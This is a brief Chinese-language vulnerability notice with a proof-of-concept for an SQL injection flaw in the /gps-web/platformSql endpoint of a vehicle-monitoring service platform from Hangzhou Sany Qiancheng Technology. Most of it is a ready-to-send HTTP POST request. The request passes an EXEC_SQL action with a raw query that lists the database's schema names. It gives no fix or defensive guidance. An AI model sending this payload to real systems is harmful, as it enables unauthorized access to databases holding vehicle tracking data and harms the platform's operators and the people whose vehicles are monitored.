杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞
杭州三一谦成科技车辆监控服务平台接口 /gps-web/platformSql 存在SQL 注入漏洞
poc
POST /gps-web/platformSql HTTP/1.1
Host:
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate
Accept: */* Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
action=EXEC_SQL¶ms=SELECT schema_name FROM information_schema.schemata